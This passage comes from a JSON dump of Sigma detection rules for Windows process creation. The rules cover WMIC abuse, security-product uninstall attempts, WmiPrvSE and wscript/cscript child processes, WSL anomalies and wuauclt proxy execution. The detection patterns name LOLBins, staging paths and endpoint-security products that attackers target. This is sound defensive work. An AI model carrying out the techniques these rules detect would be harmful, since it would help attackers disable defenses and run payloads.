attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\WINWORD.EXE'\n            - '\\EXCEL.EXE'\n            - '\\POWERPNT.exe'\n            - '\\MSPUB.exe'\n            - '\\VISIO.exe'\n            - '\\MSACCESS.EXE'\n            - '\\EQNEDT32.EXE'\n            - '\\ONENOTE.EXE'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n    selection_wmic_img:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_wmic_cli:\n        CommandLine|contains|all:\n            - 'process'\n            - 'create'\n            - 'call'\n        CommandLine|contains:\n            # Add more suspicious LOLBINs as you see fit\n            - 'regsvr32'\n            - 'rundll32'\n            - 'msiexec'\n            - 'mshta'\n            - 'verclsid'\n            - 'wscript'\n            - 'cscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml",
    "content": "title: Suspicious Process Created Via Wmic.EXE\nid: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8\nrelated:\n    - id: 526be59f-a573-4eea-b5f7-f0973207634d # Generic\n      type: derived\nstatus: test\ndescription: Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.\nreferences:\n    - https://thedfirreport.com/2020/10/08/ryuks-return/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-12\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'process '\n            - 'call '\n            - 'create '\n        CommandLine|contains:\n            # Add more susupicious paths and binaries as you see fit in your env\n            - 'rundll32'\n            - 'bitsadmin'\n            - 'regsvr32'\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n            - 'cmd /c '\n            - 'cmd /k '\n            - 'cmd /r '\n            - 'powershell'\n            - 'pwsh'\n            - 'certutil'\n            - 'cscript'\n            - 'wscript'\n            - 'mshta'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '\\AppData\\Local\\'\n            - '%temp%'\n            - '%tmp%'\n            - '%ProgramData%'\n            - '%appdata%'\n            - '%comspec%'\n            - '%localappdata%'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml",
    "content": "title: Application Terminated Via Wmic.EXE\nid: 49d9671b-0a0a-4c09-8280-d215bfd30662\nrelated:\n    - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products\n      type: derived\nstatus: test\ndescription: Detects calls to the \"terminate\" function via wmic in order to kill an application\nreferences:\n    - https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\n    - https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-11\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'call'\n            - 'terminate'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml",
    "content": "title: Application Removed Via Wmic.EXE\nid: b53317a0-8acf-4fd1-8de8-a5401e776b96\nrelated:\n    - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products\n      type: derived\nstatus: test\ndescription: Detects the removal or uninstallation of an application via \"Wmic.EXE\".\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic\nauthor: frack113\ndate: 2022-01-28\nmodified: 2024-07-02\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'call'\n            - 'uninstall'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml",
    "content": "title: Potential Tampering With Security Products Via WMIC\nid: 847d5ff3-8a31-4737-a970-aeae8fe21765\nrelated:\n    - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 # Generic Uninstall\n      type: derived\nstatus: test\ndescription: Detects uninstallation or termination of security products using the WMIC utility\nreferences:\n    - https://twitter.com/cglyer/status/1355171195654709249\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\n    - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-01-30\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'product where '\n            - 'call'\n            - 'uninstall'\n            - '/nointeractive'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'caption like '\n        CommandLine|contains:\n            - 'call delete'\n            - 'call terminate'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'process '\n            - 'where '\n            - 'delete'\n    selection_product:\n        CommandLine|contains:\n            - '%carbon%'\n            - '%cylance%'\n            - '%endpoint%'\n            - '%eset%'\n            - '%malware%'\n            - '%Sophos%'\n            - '%symantec%'\n            - 'Antivirus'\n            - 'AVG '\n            - 'Carbon Black'\n            - 'CarbonBlack'\n            - 'Cb Defense Sensor 64-bit'\n            - 'Crowdstrike Sensor'\n            - 'Cylance '\n            - 'Dell Threat Defense'\n            - 'DLP Endpoint'\n            - 'Endpoint Detection'\n            - 'Endpoint Protection'\n            - 'Endpoint Security'\n            - 'Endpoint Sensor'\n            - 'ESET File Security'\n            - 'LogRhythm System Monitor Service'\n            - 'Malwarebytes'\n            - 'McAfee Agent'\n            - 'Microsoft Security Client'\n            - 'Sophos Anti-Virus'\n            - 'Sophos AutoUpdate'\n            - 'Sophos Credential Store'\n            - 'Sophos Management Console'\n            - 'Sophos Management Database'\n            - 'Sophos Management Server'\n            - 'Sophos Remote Management System'\n            - 'Sophos Update Manager'\n            - 'Threat Protection'\n            - 'VirusScan'\n            - 'Webroot SecureAnywhere'\n            - 'Windows Defender'\n    condition: 1 of selection_cli_* and selection_product\nfalsepositives:\n    - Legitimate administration\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml",
    "content": "title: XSL Script Execution Via WMIC.EXE\nid: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\nrelated:\n    - id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32\n      type: similar\n    - id: 8d63dadf-b91b-4187-87b6-34a1114577ea\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of WMIC with the \"format\" flag to potentially load local XSL files.\n    Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\n    Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\nauthor: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel\ndate: 2019-10-21\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.t1047\n    - attack.t1220\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n        - Hashes|contains:  # Sysmon field hashes contains all types\n              - 'IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E'\n              - 'IMPHASH=37777A96245A3C74EB217308F3546F4C'\n              - 'IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206'\n              - 'IMPHASH=B12619881D79C3ACADF45E752A58554A'\n              - 'IMPHASH=16A48C3CABF98A9DC1BF02C07FE1EA00'\n    selection_cmd:\n        CommandLine|contains|windash: '-format:'     # wmic process list -FORMAT /? or wmic process list /FORMAT /?\n    filter_main_known_format:\n        CommandLine|contains:\n            - 'Format:List'\n            - 'Format:htable'\n            - 'Format:hform'\n            - 'Format:table'\n            - 'Format:mof'\n            - 'Format:value'\n            - 'Format:rawxml'\n            - 'Format:xml'\n            - 'Format:csv'\n    filter_main_remote_operation: # Covered by 8d63dadf-b91b-4187-87b6-34a1114577ea\n        CommandLine|contains:\n            - '://'\n            - '\\\\\\\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.\n    - Static format arguments - https://petri.com/command-line-wmi-part-3\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml",
    "content": "title: WmiPrvSE Spawned A Process\nid: d21374ff-f574-44a7-9998-4a8c8bf33d7d\nrelated:\n    - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937\n      type: similar\n    - id: 692f0bec-83ba-4d04-af7e-e884a96059b6\n      type: similar\nstatus: stable\ndescription: Detects WmiPrvSE spawning a process\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-15\nmodified: 2023-03-23\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WmiPrvSe.exe'\n    filter_logonid:\n        LogonId:\n            - '0x3e7'  # LUID 999 for SYSTEM\n            - 'null'   # too many false positives\n    filter_system_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_wmiprvse:\n        Image|endswith: '\\WmiPrvSE.exe'\n    filter_werfault:\n        Image|endswith: '\\WerFault.exe'\n    filter_null:  # some backends need the null value in a separate expression\n        LogonId: null\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - False positives are expected (e.g. in environments where WinRM is used legitimately)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml",
    "content": "title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell\nid: 692f0bec-83ba-4d04-af7e-e884a96059b6\nrelated:\n    - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937\n      type: similar\n    - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d\n      type: similar\nstatus: stable\ndescription: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.\nreferences:\n    - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e\nauthor: Markus Neis @Karneades\ndate: 2019-04-03\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\WmiPrvSE.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    condition: all of selection_*\nfalsepositives:\n    - AppvClient\n    - CCM\n    - WinRM\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml",
    "content": "title: Suspicious WmiPrvSE Child Process\nid: 8a582fe2-0882-4b89-a82a-da6b2dc32937\nrelated:\n    - id: 692f0bec-83ba-4d04-af7e-e884a96059b6\n      type: similar\n    - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d\n      type: similar\n    - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4\n      type: obsolete\nstatus: test\ndescription: Detects suspicious and uncommon child processes of WmiPrvSE\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\n    - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\n    - https://twitter.com/ForensicITGuy/status/1334734244120309760\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-11-10\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1047\n    - attack.t1204.002\n    - attack.t1218.010\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\wbem\\WmiPrvSE.exe'\n    selection_children_1:\n        # TODO: Add more LOLBINs or suspicious processes that make sens in your environment\n        Image|endswith:\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\verclsid.exe'\n            - '\\wscript.exe'\n    selection_children_2:\n        # This is in a separate selection due to the nature of FP generated with CMD\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - 'cscript'\n            - 'mshta'\n            - 'powershell'\n            - 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wscript'\n    filter_main_werfault:\n        Image|endswith: '\\WerFault.exe'\n    filter_main_wmiprvse:\n        Image|endswith: '\\WmiPrvSE.exe' # In some legitimate case WmiPrvSE was seen spawning itself\n    filter_main_msiexec:\n        Image|endswith: '\\msiexec.exe'\n        CommandLine|contains: '/i '\n    condition: selection_parent and 1 of selection_children_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml",
    "content": "title: UEFI Persistence Via Wpbbin - ProcessCreation\nid: 4abc0ec4-db5a-412f-9632-26659cddf145\nstatus: test\ndescription: Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section\nreferences:\n    - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c\n    - https://persistence-info.github.io/Data/wpbbin.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1542.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image: 'C:\\Windows\\System32\\wpbbin.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_dropper.yml",
    "content": "title: Potential Dropper Script Execution Via WScript/CScript\nid: cea72823-df4d-4567-950c-0b579eaf0846\nrelated:\n    - id: 1e33157c-53b1-41ad-bbcc-780b80b58288\n      type: similar\nstatus: test\ndescription: Detects wscript/cscript executions of scripts located in user directories\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://redcanary.com/blog/gootloader/\nauthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-01-30\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exec:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    selection_paths:\n        CommandLine|contains:\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    selection_ext:\n        CommandLine|contains:\n            - '.js'\n            - '.jse'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers might generate a similar behavior. An initial baseline is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml",
    "content": "title: Cscript/Wscript Potentially Suspicious Child Process\nid: b6676963-0353-4f88-90f5-36c20d443c6a\nstatus: test\ndescription: |\n    Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.\n    Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.\nreferences:\n    - Internal Research\n    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_30.10.2023.txt\n    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt\nauthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')\ndate: 2023-05-15\nmodified: 2024-01-02\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    selection_cli_script_main:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    # Note: Add other combinations that are suspicious\n    selection_cli_script_option_mshta:\n        CommandLine|contains|all:\n            - 'mshta'\n            - 'http'\n    selection_cli_script_option_other:\n        CommandLine|contains:\n            - 'rundll32'\n            - 'regsvr32'\n            - 'msiexec'\n    selection_cli_standalone:\n        Image|endswith: '\\rundll32.exe'\n    filter_main_rundll32_known_exports:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - 'UpdatePerUserSystemParameters'\n            - 'PrintUIEntry'\n            - 'ClearMyTracksByProcess'\n    condition: selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml",
    "content": "title: Cscript/Wscript Uncommon Script Extension Execution\nid: 99b7460d-c9f1-40d7-a316-1f36f61d52ee\nstatus: test\ndescription: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2023-06-19\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'wscript.exe'\n              - 'cscript.exe'\n        - Image|endswith:\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n    selection_extension:\n        CommandLine|contains:\n            # Note: add additional potential suspicious extension\n            # We could specify the \"//E:\" flag to avoid typos by admin. But since that's prone to blind spots via the creation of assoc it's better not to include it\n            - '.csv'\n            - '.dat'\n            - '.doc'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.png'\n            - '.ppt'\n            - '.txt'\n            - '.xls'\n            - '.xml'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml",
    "content": "title: WSL Child Process Anomaly\nid: 2267fe65-0681-42ad-9a6d-46553d3f3480\nrelated:\n    - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule\n      type: derived\nstatus: test\ndescription: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/\n    - https://twitter.com/nas_bench/status/1535431474429808642\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-23\nmodified: 2023-08-15\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\wsl.exe'\n            - '\\wslhost.exe'\n    selection_children_images:\n        Image|endswith:\n            # Add more suspicious/uncommon \"lolbin\" processes\n            - '\\calc.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    selection_children_paths:\n        Image|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Temp\\'\n            - 'C:\\Temp\\'\n            - '\\Downloads\\'\n            - '\\Desktop\\'\n    condition: selection_parent and 1 of selection_children_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_installation.yml",
    "content": "title: Installation of WSL Kali-Linux\nid: eca8ae39-5c3c-4321-b538-9e64fe25822e\nstatus: experimental\ndescription: |\n    Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).\n    Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.\nreferences:\n    - https://medium.com/@redfanatic7/running-kali-linux-on-windows-51ad95166e6e\n    - https://learn.microsoft.com/en-us/windows/wsl/install\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-10\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wsl_img:\n        - Image|endswith: '\\wsl.exe'\n        - OriginalFileName: 'wsl'\n    selection_wsl_install:\n        CommandLine|contains:\n            - ' --install '\n            - ' -i '\n    selection_wsl_kali:\n        CommandLine|contains: 'kali'\n    condition: all of selection_wsl_*\nfalsepositives:\n    - Legitimate installation or usage of Kali Linux WSL by administrators or security teams\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_usage.yml",
    "content": "title: WSL Kali-Linux Usage\nid: 6f1a11aa-4b8a-4b7f-9e13-4d3e4ff0e0d4\nstatus: experimental\ndescription: Detects the use of Kali Linux through Windows Subsystem for Linux\nreferences:\n    - https://medium.com/@redfanatic7/running-kali-linux-on-windows-51ad95166e6e\n    - https://learn.microsoft.com/en-us/windows/wsl/install\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-10\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_appdata:\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\AppData\\Local\\packages\\KaliLinux'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe'\n    selection_img_windowsapps:\n        Image|contains: ':\\Program Files\\WindowsApps\\KaliLinux.'\n        Image|endswith: '\\kali.exe'\n    selection_kali_wsl_parent:\n        ParentImage|endswith:\n            - '\\wsl.exe'\n            - '\\wslhost.exe'\n    selection_kali_wsl_child:\n        - Image|contains:\n              - '\\kali.exe'\n              - '\\KaliLinux'\n        - CommandLine|contains:\n              - 'Kali.exe'\n              - 'Kali-linux'\n              - 'kalilinux'\n    filter_main_install_uninstall:\n        CommandLine|contains:\n            - ' -i '\n            - ' --install '\n            - ' --unregister '\n    condition: 1 of selection_img_* or all of selection_kali_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate installation or usage of Kali Linux WSL by administrators or security teams\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml",
    "content": "title: Windows Binary Executed From WSL\nid: ed825c86-c009-4014-b413-b76003e33d35\nstatus: test\ndescription: |\n    Detects the execution of Windows binaries from within a WSL instance.\n    This could be used to masquerade parent-child relationships\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|re: '[a-zA-Z]:\\\\'\n        CurrentDirectory|contains: '\\\\\\\\wsl.localhost' # Note: programs not supporting UNC paths (example: cmd.exe). Will default to another location\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml",
    "content": "title: Proxy Execution Via Wuauclt.EXE\nid: af77cf95-c469-471c-b6a0-946c685c4798\nrelated:\n    - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0\n      type: obsolete\n    - id: d7825193-b70a-48a4-b992-8b5b3015cc11\n      type: obsolete\nstatus: test\ndescription: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.\nreferences:\n    - https://dtm.uk/wuauclt/\n    - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team\ndate: 2020-10-12\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wuauclt.exe'\n        - OriginalFileName: 'wuauclt.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'UpdateDeploymentProvider'\n            - 'RunHandlerComServer'\n    filter_main_generic:\n        # Note: Please enhance this if you find the full path\n        CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '\n    filter_main_wuaueng:\n        # Note: Please enhance this if you find the full path\n        CommandLine|contains: ' wuaueng.dll '\n    filter_main_uus:\n        CommandLine|contains:\n            - ':\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId'\n            - ':\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId'\n    filter_main_winsxs:\n        CommandLine|contains|all:\n            - ':\\Windows\\WinSxS\\'\n            - '\\UpdateDeploy.dll /ClassId '\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml",
    "content": "title: Suspicious Windows Update Agent Empty Cmdline\nid: 52d097e2-063e-4c9c-8fbb-855c8948d135\nstatus: test\ndescription: |\n    Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-26\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Wuauclt.exe'\n        - OriginalFileName: 'Wuauclt.exe'\n    selection_cli:\n        CommandLine|endswith:\n            - 'Wuauclt'\n            - 'Wuauclt.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml",
    "content": "title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths\nid: c74c0390-3e20-41fd-a69a-128f0275a5ea\nrelated:\n    - id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract \".cab\" files using the \"/extract\" argument from potentially suspicious paths.\nreferences:\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\n    - https://www.echotrail.io/insights/search/wusa.exe/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-11-28\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_root:\n        Image|endswith: '\\wusa.exe'\n        CommandLine|contains: '/extract:'\n    selection_paths:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Appdata\\Local\\Temp\\'\n            # - '\\Desktop\\'\n            # - '\\Downloads\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml",
